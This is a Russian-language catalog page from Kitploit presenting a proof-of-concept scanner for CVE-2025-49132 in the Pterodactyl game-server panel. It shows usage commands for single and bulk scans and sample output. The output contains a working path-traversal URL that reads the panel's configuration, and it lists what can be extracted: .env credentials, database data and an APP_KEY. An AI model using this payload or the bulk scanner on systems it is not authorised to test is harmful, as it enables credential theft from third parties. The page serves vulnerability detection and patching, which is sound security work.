Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-49132_poc — Pterodactyl翼龙面板CVE-2025-49132批量检测☝️🤓 | Kitploit
Инструменты/GitHubGitHub/qiaojojo/cve-2025-49132_poc
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubqiaojojo/cve-2025-49132_poc

CVE-2025-49132_poc

Pterodactyl翼龙面板CVE-2025-49132批量检测☝️🤓

Репозиторий
41 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-49132_poc

Пример использования

  1. Сканирование одной цели:
root@kitploit:~
python3 CVE-2025-49132_poc.py -u http://pterodactyl.example.com
  1. Сканирование списка целей:
root@kitploit:~
python3 CVE-2025-49132_poc.py -f 目标列表.txt
  1. Сохранение результатов сканирования:
root@kitploit:~
python3 CVE-2025-49132_poc.py -f 目标列表.txt -o 扫描结果.txt

Пример вывода:

При наличии уязвимости:

root@kitploit:~
[+] Уязвимость подтверждена

    Детали уязвимости:
      • Тип: Path Traversal
      • Вектор атаки: доступ к /locales/locale.json через параметр обхода путей
      • URL эксплуатации: http://target.com/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
      
    Потенциальное воздействие:
      • Чтение учетных данных из конфигурационного файла панели (.env)
      • Извлечение конфиденциальной информации из базы данных
      • Доступ к файлам игровых серверов, управляемых панелью
    
    Извлеченный APP_KEY: base64{{your_secret_key_here}}
    
    Рекомендация по исправлению: немедленно обновить Pterodactyl до версии v1.11.11 или выше

При отсутствии уязвимости:

root@kitploit:~
[-] Уязвимость не обнаружена: не обнаружена (код состояния: 404)

Сводка сканирования:

root@kitploit:~
Сводка сканирования:
  • Всего сканированных целей: 5
  • Целей с уязвимостями: 2
  • Безопасных целей: 3

[!] Критично: Обнаружены системы с уязвимостями! Требуются немедленные действия.
Скачать инструмент